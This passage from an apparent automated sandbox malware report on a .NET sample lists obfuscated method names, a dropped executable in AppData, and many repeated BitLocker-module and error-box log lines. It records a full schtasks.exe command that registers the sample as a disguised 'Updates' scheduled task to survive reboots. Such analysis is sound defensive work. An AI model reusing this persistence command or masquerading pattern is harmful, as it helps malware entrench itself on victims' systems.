          Source: 0.2.file.exe.7c80000.8.raw.unpack, VOscdqPPgMnIinioFi.csHigh entropy of concatenated method names: 'dLpl9XaY2F', 'ElVlDAtGXr', 'jjnlW5GoTo', 'caEloZDdZo', 'wAmlXcEA3e', 'Yh5lx6Lo30', 'DPwlUGsOhX', 'v5jlZkfYJQ', 'g0Rl4Drw7p', 'lFxl8Z6Xf6'
          Source: 0.2.file.exe.7c80000.8.raw.unpack, JLnArkmkhm5iKZ96KE.csHigh entropy of concatenated method names: 'ToString', 'VJsK8yiIBK', 'R65KobM3L8', 'eREKnrjaxl', 'QL4KXIl9EL', 'e1cKxr6rca', 'ifYKtJk8fJ', 'tSPKUXTnBo', 'TYpKZuT3M4', 'Cx0KAygWIU'
          Source: 0.2.file.exe.7c80000.8.raw.unpack, HJdMyIsLI0JDPM1XEd.csHigh entropy of concatenated method names: 'wKHyFSlvcL', 'iiSy3wxSZ6', 'gjXyNtS8FN', 'ADbyOeeIZl', 'bpmy0RDGZH', 'DguyK6xAej', 'y6DUxiSSY1tyP7wM0g', 'UbhbqsXCNtFcJhDvc9', 'yCZyy5UPkc', 'rphyIb9Sr1'
          Source: 0.2.file.exe.7c80000.8.raw.unpack, Iv5gZqDjXtS8FN1Dbe.csHigh entropy of concatenated method names: 'M5mvMkTVCI', 'irvvHSwO8l', 'VGrv97DU1g', 'lXBvD6k1p3', 'RGNv0wDeOJ', 'vOuvKTmXF8', 'Hvsvkng0lX', 'iQhvcH9Gwx', 'pDJvTBcUVx', 'N2RvENrc2L'
          Source: 0.2.file.exe.7c80000.8.raw.unpack, BqKGVR3k2PVtU8wwGi.csHigh entropy of concatenated method names: 'RJmIQD7Xpg', 'vyLIYywW2h', 'uX8IqrwUQ4', 'KinIv314v6', 'iIrIR05bZ6', 'HXCI2MUC1c', 'yFLIFAmuDf', 'LqPI31v0mX', 'KEaIfhj4ZB', 'UVHINA0kFW'
          Source: 0.2.file.exe.7c80000.8.raw.unpack, uAUblPbA0oeE9UjS3G.csHigh entropy of concatenated method names: 'Ejsk75y4XO', 'sy0kVq7tKN', 'i9Bcr3nnQG', 'pXGcyXPu1H', 'HaTk8U5YxB', 'uPukCgUWOW', 'FYrkPtPSoI', 'afDkpYxRWa', 'BU8kuRXGVP', 'sEVkm9xTKv'
          Source: 0.2.file.exe.7c80000.8.raw.unpack, hRcrlZAFKLddya1Mtw.csHigh entropy of concatenated method names: 'Eu5Faeis5n', 'gp8FLNrDL8', 'Kd3F53Kc3K', 'EUJFMdbhCG', 'LvWF1qW9Hf', 'a9sFHPf0tF', 'uY9FBLpmZ6', 'DNwF9iaBce', 'fvnFDbYt7M', 'EXcFjGdH53'
          Source: 0.2.file.exe.7c80000.8.raw.unpack, NV8yME6ChnEJARudpA.csHigh entropy of concatenated method names: 'UL3TWGlv6L', 'lucTofU551', 'I4iTnO6ecF', 'GWKTXe6YAA', 'jr4TxVBo50', 'KhcTtK6dNr', 'oH7TU0pnJo', 'EKkTZTHGnr', 'zVRTAMg5VM', 'C0QT4lgxsn'
          Source: 0.2.file.exe.7c80000.8.raw.unpack, tY5HjqzKN8uxJt6NbB.csHigh entropy of concatenated method names: 'E30EHYTJhy', 'WFoE9M0cHt', 'LfkEDqGhbl', 'XHyEWdnWFh', 'RcAEoeW4sg', 'teZEXZpmIO', 'lngExCH42J', 'Jd1EinoflZ', 'AWqEaHinhQ', 'V1NELhvQSv'
          Source: 0.2.file.exe.7c80000.8.raw.unpack, upsOjYyeo2gSAjhgBF2.csHigh entropy of concatenated method names: 'ToString', 'yPLG9iK9CD', 've6GDUoMe4', 'hGaGj1fCkq', 'ePvGWxCxWT', 'eG6GoTGUu5', 'SsGGnDrL02', 'I6TGXOUylu', 'AwYLOZ2XoIQHYTMAcy3', 'gHX7Hy2olh96g1XIeNC'
          Source: 0.2.file.exe.7c80000.8.raw.unpack, G7dFsEUlYlLEsyWBft.csHigh entropy of concatenated method names: 'LSDFYnvURj', 'oCVFvolKII', 'A5tF2skBda', 'l5x2Vp8V1c', 'gbS2zngkXZ', 'Po7FrnNF7x', 'b54FysCSLE', 'olJFex5Wtp', 'cYYFIoMVnQ', 'K6vFs8vQJr'
          Source: 0.2.file.exe.7c80000.8.raw.unpack, FXZ8IUehT0bSEZaXbH.csHigh entropy of concatenated method names: 'BX65X3BKL', 'B5BMa7gjT', 'o2lH0TExL', 'kqIBmVsrG', 'm4wDeL4IF', 'MS8j2YU5J', 'nvmxXKP74YPghMhS3s', 'gEeeyl8AXcrKOBnlql', 'h6DcbhxMn', 'rcuEykXVs'
          Source: 0.2.file.exe.7c80000.8.raw.unpack, frjggDwnjhsjq9SM5G.csHigh entropy of concatenated method names: 'CNukNhMqOr', 'TDmkO7wV4P', 'ToString', 'oaIkYbPoJ2', 'NfPkqbS47R', 'MvnkvkE2Ug', 'OGrkRTnJRk', 'xCHk2mg9TI', 'hQ1kFjZWJO', 'dU8k3xpIVB'
          Source: 0.2.file.exe.7c80000.8.raw.unpack, MSWwGCgfWPrfAnRWBH.csHigh entropy of concatenated method names: 'NfaT0FOPQN', 'KdmTkSiJYd', 'WcETTw61T3', 'KAiTGaNKY1', 'KCPThTybEA', 'pf5TinoeIQ', 'Dispose', 'g08cYpQk5C', 'N31cqP2p2K', 'WcMcvKh1hD'
          Source: 0.2.file.exe.7c80000.8.raw.unpack, k7B0l3yy8f4Is3A51Bv.csHigh entropy of concatenated method names: 'h0OEVP2TPV', 'UqREzayych', 'c8EGrbPlI2', 'wccGyqejIF', 'uUHGeOplnZ', 'SBUGIl3JnK', 'qreGs9Q3j2', 'X5wGQQeVlR', 'uWNGYx01ar', 'LETGquZSNI'
          Source: 0.2.file.exe.7c80000.8.raw.unpack, SwoZNhysK5gPXNhHbP8.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'hreJTqq0Pr', 'gv8JE8hd5y', 'BlrJGAN15h', 'PhGJJyO6N5', 'XtFJhbCugj', 'RMNJSXcmQu', 'gTRJiuXaOa'
          Source: 0.2.file.exe.7c80000.8.raw.unpack, X3CaVTVayapPsW3c2W.csHigh entropy of concatenated method names: 'XLUEvyC6sa', 'llvERkL6X7', 'xIvE2r49D4', 'x1eEFdRMg0', 'KUuETHb7rv', 'W9KE3H2yQr', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.file.exe.7c80000.8.raw.unpack, CSlvcL92iSwxSZ6lOu.csHigh entropy of concatenated method names: 'VQTqpS4eDN', 'kh5quB4gkt', 'ygXqmGooUb', 'sX2qwyLZHp', 'iyoqdIP4Ay', 'PPXqbbD2cx', 'yD2qgE1Y4X', 'Wxbq7I7pwk', 'pTUq6PiN5G', 'xHwqV2K76J'
          Source: 0.2.file.exe.7c80000.8.raw.unpack, tZH9guW6xAejPDioPK.csHigh entropy of concatenated method names: 'Qte2QHZbPt', 'kCA2qTjhfu', 'B9c2ROqTTr', 'UsK2FGDy6p', 'bIQ237jYwo', 'u1sRdgBoCQ', 'pVVRbLAw2k', 'kWVRgNN3tw', 'WNJR75ONCr', 'staR6Xk1HL'
          Source: 0.2.file.exe.7c80000.8.raw.unpack, DhF5wXyrQ6UCuGgapu7.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zZkE8FOk8b', 'HNvECXNbhD', 'r3AEPXyhu6', 'YfDEpR1DsP', 'gawEubqEmQ', 'kSVEms5mKq', 'FyHEw2xOud'
          Source: 0.2.file.exe.7c80000.8.raw.unpack, ytmCkKqcA2Y2Rc1bOB.csHigh entropy of concatenated method names: 'Dispose', 'Qrfy6AnRWB', 'vNieojG4PK', 'j53yAN9J2P', 'BhIyVY96Mj', 'Os3yzGRQth', 'ProcessDialogKey', 'bq4erV8yME', 'PhneyEJARu', 'UpAee73CaV'
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\NnXVkDOvj.exeJump to dropped file

          Boot Survival

          barindex
          Uses schtasks.exe or at.exe to add and modify task schedules
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NnXVkDOvj" /XML "C:\Users\user\AppData\Local\Temp\tmpD1A2.tmp"

          Hooking and other Techniques for Hiding and Protection

          barindex
          Loading BitLocker PowerShell Module
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
